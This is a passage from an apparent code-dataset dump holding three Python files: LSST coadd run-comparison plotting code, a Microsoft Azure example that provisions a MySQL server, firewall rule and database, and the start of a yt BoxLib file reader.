if\n patchRef2.datasetExists(self.config.coaddName + dataset2)]\n else:\n patchRefExistsList2 = []\n for patchRef2 in patchRefList2:\n dataId = patchRef2[\"dataId\"]\n try:\n patchRef2[\"butler\"].getURI(self.config.coaddName + dataset2, dataId=dataId)\n patchRefExistsList2.append(patchRef2)\n except LookupError:\n self.log.info(\"Could not find {} dataset for dataId {}. Skipping...\".\n format(dataset2, dataId))\n continue\n\n if not patchRefExistsList1 or not patchRefExistsList2:\n haveForced = False\n forcedStr = \"forced\" if haveForced else \"unforced\"\n if not haveForced:\n self.log.warning(\"Forced datasets do not exist for both input1 and input2 for tract: {0:d} \"\n \"filter: {1:s}. Plotting unforced results only.\".\n format(patchRefList1[0].dataId[\"tract\"], patchRefList1[0].dataId[\"filter\"]))\n dataset1 = \"Coadd_meas\"\n dataset2 = \"Coadd_meas\"\n patchRefExistsList1 = [patchRef1 for patchRef1 in patchRefList1 if\n patchRef1.datasetExists(self.config.coaddName + dataset1)]\n if not patchRefExistsList1:\n raise TaskError(\"No data exists in patRefList1: %s\" %\n ([patchRef1.dataId for patchRef1 in patchRefList1]))\n\n patchList1 = [patchRef.dataId[\"patch\"] for patchRef in patchRefExistsList1]\n patchIdList1 = patchList1\n if repoInfo2.isGen3:\n patchList2 = [patchRef[\"patchId\"] for patchRef in patchRefExistsList2]\n else:\n patchList2 = patchList1\n patchRefList1 = patchRefExistsList1\n patchRefList2 = patchRefExistsList2\n\n repoInfo1 = getRepoInfo(patchRefList1[0], coaddName=self.config.coaddName, coaddDataset=dataset1)\n repoInfo2 = getRepoInfo(patchRefList2[0], coaddName=self.config.coaddName, coaddDataset=dataset2)\n hscRun = repoInfo1.hscRun if repoInfo1.hscRun else repoInfo2.hscRun\n # Find a visit/ccd input so that you can check for meas_mosaic input\n # (i.e. to set uberCalLabel).\n self.uberCalLabel1 = determineExternalCalLabel(repoInfo1, patchList1[0],\n coaddName=self.config.coaddName)\n self.uberCalLabel2 = determineExternalCalLabel(repoInfo2, patchList2[0],\n coaddName=self.config.coaddName)\n self.uberCalLabel1 = self.uberCalLabel1.replace(\" wcs\", \"_1 wcs\")\n self.uberCalLabel2 = self.uberCalLabel2.replace(\" wcs\", \"_2 wcs\")\n self.uberCalLabel = self.uberCalLabel1 + \"_1\\n\" + self.uberCalLabel2 + \"_2\"\n self.log.info(f\"External calibration(s) used: {self.uberCalLabel}\")\n\n if self.config.doReadParquetTables1 or self.config.doReadParquetTables2:\n if self.config.doReadParquetTables1:\n if haveForced:\n forced1, _ = self.readParquetTables(patchRefList1, self.config.coaddName + \"Coadd_obj\",\n repoInfo1, \"forced_src\")\n unforced1, _ = self.readParquetTables(patchRefList1, self.config.coaddName + \"Coadd_obj\",\n repoInfo1, \"meas\")\n areaDict1, _ = computeAreaDict(repoInfo1, patchRefList1,\n dataset=self.config.coaddName + \"Coadd\", fakeCat=None)\n if self.config.doReadParquetTables2:\n if haveForced:\n forced2, _ = self.readParquetTables(patchRefList2, self.config.coaddName + \"Coadd_obj\",\n repoInfo2, \"forced_src\")\n unforced2, _ = self.readParquetTables(patchRefList2, self.config.coaddName + \"Coadd_obj\",\n repoInfo2, \"meas\")\n\n if not self.config.doReadParquetTables1 or not self.config.doReadParquetTables2:\n aliasDictList = [self.config.flagsToAlias, ]\n if hscRun and self.config.srcSchemaMap is not None:\n aliasDictList += [self.config.srcSchemaMap]\n\n if not self.config.doReadParquetTables1:\n catStruct1 = self.readAfwCoaddTables(patchRefList1, repoInfo1, haveForced,\n aliasDictList=aliasDictList)\n unforced1 = catStruct1.unforced\n forced1 = catStruct1.forced\n areaDict1 = catStruct1.areaDict\n\n if not self.config.doReadParquetTables2:\n catStruct2 = self.readAfwCoaddTables(patchRefList2, repoInfo2, haveForced,\n aliasDictList=aliasDictList)\n unforced2 = catStruct2.unforced\n forced2 = catStruct2.forced\n\n forcedStr = \"forced\" if haveForced else \"unforced\"\n # Set boolean array indicating sources deemed unsuitable for qa\n # analyses.\n badUnforced1 = makeBadArray(unforced1, onlyReadStars=self.config.onlyReadStars)\n badUnforced2 = makeBadArray(unforced2, onlyReadStars=self.config.onlyReadStars)\n if haveForced:\n badForced1 = makeBadArray(forced1, onlyReadStars=self.config.onlyReadStars)\n badForced2 = makeBadArray(forced2, onlyReadStars=self.config.onlyReadStars)\n\n # Purge the catalogs of flagged sources\n unforced1 = unforced1[~badUnforced1].copy(deep=True)\n unforced2 = unforced2[~badUnforced2].copy(deep=True)\n if haveForced:\n forced1 = forced1[~badForced1].copy(deep=True)\n forced2 = forced2[~badForced2].copy(deep=True)\n else:\n forced1 = unforced1\n forced2 = unforced2\n self.log.info(\"\\nNumber of sources in unforced catalogs: first = {0:d} and second = {1:d}\".\n format(len(unforced1), len(unforced2)))\n self.log.info(\"\\nNumber of sources in forced catalogs: first = {0:d} and second = {1:d}\".\n format(len(forced1), len(forced2)))\n\n unforced = matchAndJoinCatalogs(unforced1, unforced2, self.matchRadius, matchXy=self.config.matchXy,\n camera1=repoInfo1.camera, camera2=repoInfo2.camera)\n forced = matchAndJoinCatalogs(forced1, forced2, self.matchRadius, matchXy=self.config.matchXy,\n camera1=repoInfo1.camera, camera2=repoInfo2.camera)\n self.log.info(\"Number [fraction] of matches (maxDist = {0:.2f}{1:s}) = {2:d} [{3:d}%] (unforced) \"\n \"{4:d} [{5:d}%] (forced)\".\n format(self.matchRadius, self.matchRadiusUnitStr,\n len(unforced), int(100*len(unforced)/len(unforced1)),\n len(forced), int(100*len(forced)/len(forced1))))\n\n self.catLabel = \" scarlet\" if \"first_deblend_scarletFlux\" in getSchema(unforced) else \" nChild = 0\"\n forcedStr = forcedStr + \" \" + self.catLabel\n schema = getSchema(forced)\n\n subdir = \"patch-\" + str(patchList1[0]) if len(patchList1) == 1 else subdir\n # Always highlight points with x-axis flag set (for cases where\n # they do not get explicitly filtered out).\n highlightList = [(self.config.analysis.fluxColumn.replace(\"_instFlux\", \"_flag\"), 0, \"turquoise\"), ]\n # Dict of all parameters common to plot* functions\n plotKwargs1 = dict(matchRadius=self.matchRadius, matchRadiusUnitStr=self.matchRadiusUnitStr,\n zpLabel=self.zpLabel, highlightList=highlightList, uberCalLabel=self.uberCalLabel)\n plotInfoDict = getPlotInfo(repoInfo1)\n try:\n rerun2Str = list(repoInfo2.butler.storage.repositoryCfgs)[0]\n except AttributeError:\n rootDir = str(repoInfo2.butler.datastore.root)\n rootDir = rootDir.replace(\"file://\", \"\")\n rerun2Str = rootDir + repoInfo2.butler.collections[0]\n plotInfoDict.update(dict(patchList=patchList1, patchIdList=patchIdList1, hscRun=hscRun,\n tractInfo=repoInfo1.tractInfo,\n dataId=repoInfo1.dataId, plotType=\"plotCompareCoadd\", subdir=subdir,\n hscRun1=repoInfo1.hscRun, hscRun2=repoInfo2.hscRun,\n rerun2=rerun2Str))\n\n if self.config.doPlotMags:\n fluxToPlotList = [flux for flux in self.config.fluxToPlotList]\n for gaapFlux in self.config.gaapFluxList:\n haveGaap = gaapFlux + \"_instFlux\" in schema\n if haveGaap:\n fluxToPlotList.append(gaapFlux)\n plotList.append(self.plotMags(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n fluxToPlotList=fluxToPlotList, **plotKwargs1))\n\n if self.config.doPlotSizes:\n if (\"first_base_SdssShape_psf_xx\" in schema and \"second_base_SdssShape_psf_xx\" in schema):\n plotList.append(self.plotSizes(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n **plotKwargs1))\n else:\n self.log.warning(\"Cannot run plotSizes: base_SdssShape_psf_xx not in schema\")\n\n if self.config.doApCorrs:\n plotList.append(self.plotApCorrs(unforced, plotInfoDict, areaDict1,\n forcedStr=\"unforced \" + self.catLabel, **plotKwargs1))\n if self.config.doPlotCentroids:\n plotList.append(self.plotCentroids(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n **plotKwargs1))\n if self.config.doPlotStarGalaxy:\n plotList.append(self.plotStarGal(forced, plotInfoDict, areaDict1, forcedStr=forcedStr,\n **plotKwargs1))\n\n self.allStats, self.allStatsHigh = savePlots(plotList, \"plotCompareCoadd\", repoInfo1.dataId,\n repoInfo1.butler, subdir=subdir)\n\n def plotMags(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, fluxToPlotList=None, postFix=\"\",\n highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in fluxToPlotList:\n if (\"first_\" + col + \"_instFlux\" in schema and \"second_\" + col + \"_instFlux\" in schema):\n shortName = \"diff_\" + col + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, MagDiffCompare(col + \"_instFlux\", unitScale=self.unitScale),\n \" Run Comparison: %s mag diff (%s)\" %\n (fluxToPlotString(col), unitStr), shortName, self.config.analysis,\n prefix=\"first_\", qMin=-0.05, qMax=0.05,\n errFunc=MagDiffCompareErr(col + \"_instFlux\", unitScale=self.unitScale),\n labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale,).plotAll(shortName, plotInfoDict, areaDict,\n self.log, enforcer=enforcer,\n matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel,\n uberCalLabel=uberCalLabel,\n forcedStr=forcedStr,\n highlightList=highlightList)\n\n def plotCentroids(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n unitStr = \"milliPixels\" if self.config.toMilli else \"pixels\"\n distEnforcer = None\n centroidStr1, centroidStr2 = \"base_SdssCentroid\", \"base_SdssCentroid\"\n if bool(plotInfoDict[\"hscRun1\"]) ^ bool(plotInfoDict[\"hscRun2\"]):\n if not plotInfoDict[\"hscRun1\"]:\n centroidStr1 = \"base_SdssCentroid_Rot\"\n if not plotInfoDict[\"hscRun2\"]:\n centroidStr2 = \"base_SdssCentroid_Rot\"\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, zpLabel=zpLabel,\n forcedStr=forcedStr, uberCalLabel=uberCalLabel)\n\n shortName = \"diff_x\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, CentroidDiff(\"x\", centroid1=centroidStr1, centroid2=centroidStr2,\n unitScale=self.unitScale),\n \"Run Comparison: x offset (%s)\" % unitStr, shortName,\n self.config.analysis, prefix=\"first_\",\n qMin=-0.08, qMax=0.08, errFunc=None,\n labeller=OverlapsStarGalaxyLabeller()).\\\n plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=distEnforcer, **plotAllKwargs)\n shortName = \"diff_y\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, CentroidDiff(\"y\", centroid1=centroidStr1, centroid2=centroidStr2,\n unitScale=self.unitScale),\n \"Run Comparison: y offset (%s)\" % unitStr, shortName, self.config.analysis,\n prefix=\"first_\", qMin=-0.08, qMax=0.08, errFunc=None,\n labeller=OverlapsStarGalaxyLabeller()).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n enforcer=distEnforcer,\n **plotAllKwargs)\n\n unitStr = \"mas\" if self.config.toMilli else \"arcsec\"\n shortName = \"diff_raCosDec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, AstrometryDiff(\"first_coord_ra\", \"second_coord_ra\",\n declination1=\"first_coord_dec\",\n declination2=\"second_coord_dec\",\n unitScale=self.unitScale),\n r\" Run Comparison: $\\delta_{RA}$ = $\\Delta$RA*cos(Dec) (%s)\" % unitStr,\n shortName, self.config.analysisAstromMatches, prefix=\"first_\",\n qMin=-0.2*matchRadius, qMax=0.2*matchRadius,\n labeller=OverlapsStarGalaxyLabeller(), unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n shortName = \"diff_ra\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, AstrometryDiff(\"first_coord_ra\", \"second_coord_ra\", declination1=None,\n declination2=None, unitScale=self.unitScale),\n r\"Run Comparison: $\\Delta$RA (%s)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"first_\", qMin=-0.25*matchRadius,\n qMax=0.25*matchRadius, labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n shortName = \"diff_dec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, AstrometryDiff(\"first_coord_dec\", \"second_coord_dec\",\n unitScale=self.unitScale),\n r\"$\\delta_{Dec}$ (%s)\" % unitStr, shortName, self.config.analysisAstromMatches,\n prefix=\"first_\", qMin=-0.3*matchRadius, qMax=0.3*matchRadius,\n labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n\n def plotFootprint(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, postFix=\"\", highlightList=None,\n uberCalLabel=None):\n yield\n enforcer = None\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel, forcedStr=forcedStr, uberCalLabel=uberCalLabel, postFix=postFix)\n shortName = \"diff_footArea\"\n col = \"base_FootprintArea_value\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, FootAreaDiffCompare(col), \" Run Comparison: Footprint Area difference\",\n shortName, self.config.analysis, prefix=\"first_\", qMin=-250, qMax=250,\n labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n shortName = \"diff_footArea_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, FootAreaDiffCompare(col),\n \" Run Comparison: Footprint Area diff (psf_used)\",\n shortName, self.config.analysis, prefix=\"first_\", goodKeys=[\"calib_psf_used\"],\n qMin=-150, qMax=150, labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n highlightList=highlightList, **plotAllKwargs)\n\n def plotSizes(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel, forcedStr=forcedStr, uberCalLabel=uberCalLabel)\n for col in [\"base_PsfFlux\"]:\n if (\"first_\" + col + \"_instFlux\" in schema and \"second_\" + col + \"_instFlux\" in schema):\n # Make comparison plots for all objects and calib_psf_used\n # only objects.\n for goodFlags in [[], [\"calib_psf_used\"]]:\n subCatString = \" (calib_psf_used)\" if \"calib_psf_used\" in goodFlags else \"\"\n shortNameBase = \"trace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n compareCol = \"base_SdssShape\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol),\n \" SdssShape Trace Radius Diff (%)\" + subCatString,\n shortName, self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-0.5, qMax=1.5,\n labeller=OverlapsStarGalaxyLabeller()).plotAll(shortName,\n plotInfoDict, areaDict,\n self.log,\n enforcer=enforcer,\n **plotAllKwargs)\n\n shortNameBase = \"psfTrace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol + \"_psf\"),\n \" SdssShape PSF Trace Radius Diff (%)\" + subCatString,\n shortName, self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-1.1, qMax=1.1,\n labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n\n if \"first_ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortNameBase = \"hsmTrace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol),\n \" HSM Trace Radius Diff (%)\" + subCatString, shortName,\n self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-0.5, qMax=1.5,\n labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n shortNameBase = \"hsmPsfTrace\"\n shortName = (shortNameBase + \"_calib_psf_used\" if \"calib_psf_used\" in goodFlags else\n shortNameBase)\n if \"first_ext_shapeHSM_PsfMoments_xx\" in schema:\n compareCol = \"ext_shapeHSM_HsmPsfMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, TraceSizeCompare(compareCol),\n \" HSM PSF Trace Radius Diff (%)\" + subCatString,\n shortName, self.config.analysis, prefix=\"first_\",\n goodKeys=goodFlags, qMin=-1.1, qMax=1.1,\n labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n\n compareCol = \"base_SdssShape\"\n shortName = \"sdssXx\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(compareCol + \"_xx\"), \"SdssShape xx Moment Diff (%)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.5, qMax=1.5, labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, **plotAllKwargs)\n shortName = \"sdssYy\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(compareCol + \"_yy\"), \"SdssShape yy Moment Diff (%)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.5, qMax=1.5, labeller=OverlapsStarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n\n def plotStarGal(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n enforcer = None\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, zpLabel=zpLabel,\n forcedStr=forcedStr, highlightList=highlightList, uberCalLabel=uberCalLabel)\n baseCol = \"ext_shapeHSM_HsmShapeRegauss\"\n col = baseCol + \"_resolution\"\n if \"first_\" + col in schema:\n shortName = \"diff_resolution\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(col),\n \" Run Comparison: HsmRegauss Resolution (% diff)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.2, qMax=0.2, labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n col = baseCol + \"_e1\"\n if \"first_\" + col in schema:\n shortName = \"diff_HsmShapeRegauss_e1\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(col), \" Run Comparison: HsmRegauss e1 (% diff)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.2, qMax=0.2, labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n col = baseCol + \"_e2\"\n if \"first_\" + col in schema:\n shortName = \"diff_HsmShapeRegauss_e2\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from Analysis(catalog, PercentDiff(col), \" Run Comparison: HsmRegauss e2 (% diff)\",\n shortName, self.config.analysis, prefix=\"first_\",\n qMin=-0.2, qMax=0.2, labeller=OverlapsStarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n **plotAllKwargs)\n\n def plotApCorrs(self, catalog, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, fluxToPlotList=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in fluxToPlotList:\n if \"first_\" + col + \"_apCorr\" in schema and \"second_\" + col + \"_apCorr\" in schema:\n shortName = \"diff_\" + col + \"_apCorr\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n # apCorrs in coadds can be all nan if they weren't run in sfm,\n # so add a check for valid data but here so we don't encounter\n # the fatal error in Analysis.\n if (len(np.where(np.isfinite(catalog[\"first_\" + col + \"_apCorr\"]))[0]) > 0\n and len(np.where(np.isfinite(catalog[\"second_\" + col + \"_apCorr\"]))[0]) > 0):\n yield from Analysis(catalog, MagDiffCompare(col + \"_apCorr\", unitScale=self.unitScale),\n \" Run Comparison: %s apCorr diff (%s)\" %\n (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, prefix=\"first_\", qMin=-0.025,\n qMax=0.025, labeller=OverlapsStarGalaxyLabeller(),\n unitScale=self.unitScale\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr,\n zpLabel=zpLabel, forcedStr=forcedStr,\n highlightList=highlightList\n + [(col + \"_flag_apCorr\", 0, \"lime\"), ],\n uberCalLabel=uberCalLabel)\n else:\n self.log.warning(\"No valid data points for shortName = {:s}. Skipping...\".\n format(shortName))\n\n def _getConfigName(self):\n return None\n\n def _getMetadataName(self):\n return None\n\n def _getEupsVersionsName(self):\n return None\n","repo_name":"lsst-dm/pipe_analysis","sub_path":"python/lsst/pipe/analysis/coaddAnalysis.py","file_name":"coaddAnalysis.py","file_ext":"py","file_size_in_byte":189940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"81300602","text":"import random, os\nfrom azure.identity import AzureCliCredential\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.rdbms.mysql import MySQLManagementClient\nfrom azure.mgmt.rdbms.mysql.models import ServerForCreate, ServerPropertiesForDefaultCreate, ServerVersion\n\n# Acquire a credential object using CLI-based authentication.\ncredential = AzureCliCredential()\n\n# Retrieve subscription ID from environment variable\nsubscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\n\n# Constants we need in multiple places: the resource group name and the region\n# in which we provision resources. You can change these values however you want.\nRESOURCE_GROUP_NAME = 'PythonAzureExample-DB-rg'\nLOCATION = \"westus\"\n\n# Step 1: Provision the resource group.\nresource_client = ResourceManagementClient(credential, subscription_id)\n\nrg_result = resource_client.resource_groups.create_or_update(RESOURCE_GROUP_NAME,\n { \"location\": LOCATION })\n\nprint(f\"Provisioned resource group {rg_result.name}\")\n\n# For details on the previous code, see Example: Provision a resource group\n# at https://docs.microsoft.com/azure/developer/python/azure-sdk-example-resource-group\n\n\n# Step 2: Provision the database server\n\n# We use a random number to create a reasonably unique database server name.\n# If you've already provisioned a database and need to re-run the script, set\n# the DB_SERVER_NAME environment variable to that name instead.\n#\n# Also set DB_USER_NAME and DB_USER_PASSWORD variables to avoid using the defaults.\n\ndb_server_name = os.environ.get(\"DB_SERVER_NAME\", f\"PythonAzureExample-MySQL-{random.randint(1,100000):05}\")\ndb_admin_name = os.environ.get(\"DB_ADMIN_NAME\", \"azureuser\")\ndb_admin_password = os.environ.get(\"DB_ADMIN_PASSWORD\", \"ChangePa$$w0rd24\")\n\n# Obtain the management client object\nmysql_client = MySQLManagementClient(credential, subscription_id)\n\n# Provision the server and wait for the result\npoller = mysql_client.servers.begin_create(RESOURCE_GROUP_NAME,\n db_server_name, \n ServerForCreate(\n location=LOCATION,\n properties=ServerPropertiesForDefaultCreate(\n administrator_login=db_admin_name,\n administrator_login_password=db_admin_password,\n version=ServerVersion.FIVE7\n )\n )\n)\n\nserver = poller.result()\n\nprint(f\"Provisioned MySQL server {server.name}\")\n\n# Step 3: Provision a firewall rule to allow the local workstation to connect\n\nRULE_NAME = \"allow_ip\"\nip_address = os.environ[\"PUBLIC_IP_ADDRESS\"]\n\n# For the above code, create an environment variable named PUBLIC_IP_ADDRESS that\n# contains your workstation's public IP address as reported by a site like\n# https://whatismyipaddress.com/.\n\n# Provision the rule and wait for completion\npoller = mysql_client.firewall_rules.begin_create_or_update(RESOURCE_GROUP_NAME,\n db_server_name, RULE_NAME, \n { \"start_ip_address\": ip_address, \"end_ip_address\": ip_address } \n)\n\nfirewall_rule = poller.result()\n\nprint(f\"Provisioned firewall rule {firewall_rule.name}\")\n\n\n# Step 4: Provision a database on the server\n\ndb_name = os.environ.get(\"DB_NAME\", \"example-db1\")\n \npoller = mysql_client.databases.begin_create_or_update(RESOURCE_GROUP_NAME,\n db_server_name, db_name, {})\n\ndb_result = poller.result()\n\nprint(f\"Provisioned MySQL database {db_result.name} with ID {db_result.id}\")\n","repo_name":"MicrosoftDocs/python-sdk-docs-examples","sub_path":"db/provision_db.py","file_name":"provision_db.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"42056542026","text":"import os\nfrom collections import defaultdict\n\nimport numpy as np\n\nfrom yt.frontends.chombo.io import parse_orion_sinks\nfrom yt.funcs import mylog\nfrom yt.geometry.selection_routines import GridSelector\nfrom yt.utilities.io_handler import BaseIOHandler\n\n\ndef _remove_raw(all_fields, raw_fields):\n centered_fields = set(all_fields)\n for raw in raw_fields:\n centered_fields.discard(raw)\n return list(centered_fields)\n\n\nclass IOHandlerBoxlib(BaseIOHandler):\n _dataset_type = \"boxlib_native\"\n\n def __init__(self, ds, *args, **kwargs):\n super().__init__(ds)\n\n def _read_fluid_selection(self, chunks, selector, fields, size):\n chunks = list(chunks)\n if any((not (ftype == \"boxlib\" or ftype == \"raw\") for ftype, fname in fields)):\n raise NotImplementedError\n rv = {}\n raw_fields = []\n for field in fields:\n if field[0] == \"raw\":\n nodal_flag = self.ds.nodal_flags[field[1]]\n num_nodes = 2 ** sum(nodal_flag)\n rv[field] = np.empty((size, num_nodes), dtype=\"float64\")\n raw_fields.append(field)\n else:\n rv[field] = np.empty(size, dtype=\"float64\")\n centered_fields = _remove_raw(fields, raw_fields)\n ng = sum(len(c.objs) for c in chunks)\n mylog.debug(\n \"Reading %s cells of %s fields in %s grids\",\n size,\n [f2 for f1, f2 in fields],\n ng,\n )\n ind = 0\n for chunk in chunks:\n data = self._read_chunk_data(chunk, centered_fields)\n for g in chunk.objs:\n for field in fields:\n if field in centered_fields:\n ds = data[g.id].pop(field)\n else:\n ds = self._read_raw_field(g, field)\n nd = g.select(selector, ds, rv[field], ind)\n ind += nd\n data.pop(g.id)\n return rv\n\n def _read_raw_field(self, grid, field):\n field_name = field[1]\n base_dir = self.ds.index.raw_file\n\n nghost = self.ds.index.raw_field_nghost[field_name]\n box_list = self.ds.index.raw_field_map[field_name][0]\n fn_list = self.ds.index.raw_field_map[field_name][1]\n offset_list = self.ds.index.raw_field_map[field_name][2]\n\n lev = grid.Level\n filename = os.path.join(base_dir, f\"Level_{lev}\", fn_list[grid.id])\n offset = offset_list[grid.id]\n box = box_list[grid.id]\n\n lo = box[0] - nghost\n hi = box[1] + nghost\n shape = hi - lo + 1\n with open(filename, \"rb\") as f:\n f.seek(offset)\n f.readline() # always skip the first line\n arr = np.fromfile(f, \"float64\", np.prod(shape))\n arr = arr.reshape(shape, order=\"F\")\n return arr[\n tuple(\n slice(None) if (nghost[dim] == 0) else slice(nghost[dim], -nghost[dim])\n for dim in range(self.ds.dimensionality)\n )\n ]\n\n def _read_chunk_data(self, chunk, fields):\n data = {}\n grids_by_file = defaultdict(list)\n if len(chunk.objs) == 0:\n return data\n for g in chunk.objs:\n if g.filename is None:\n continue\n grids_by_file[g.filename].append(g)\n dtype = self.ds.index._dtype\n bpr = dtype.itemsize\n for filename in grids_by_file:\n grids = grids_by_file[filename]\n grids.sort(key=lambda a: a._offset)\n f = open(filename, \"rb\")\n for grid in grids:\n data[grid.id] = {}\n local_offset = grid._get_offset(f) - f.tell()\n count = grid.ActiveDimensions.prod()\n size = count * bpr\n for field in self.ds.index.field_order:\n if field in fields:\n # We read it ...\n f.seek(local_offset, os.SEEK_CUR)\n v = np.fromfile(f, dtype=dtype, count=count)\n v = v.reshape(grid.ActiveDimensions, order=\"F\")\n data[grid.id][field] = v\n local_offset = 0\n else:\n local_offset += size\n f.close()\n return data\n\n def _read_particle_coords(self, chunks, ptf):\n yield from (\n (ptype, xyz, 0.0)\n for ptype, xyz in self._read_particle_fields(chunks, ptf, None)\n )\n\n def _read_particle_fields(self, chunks, ptf, 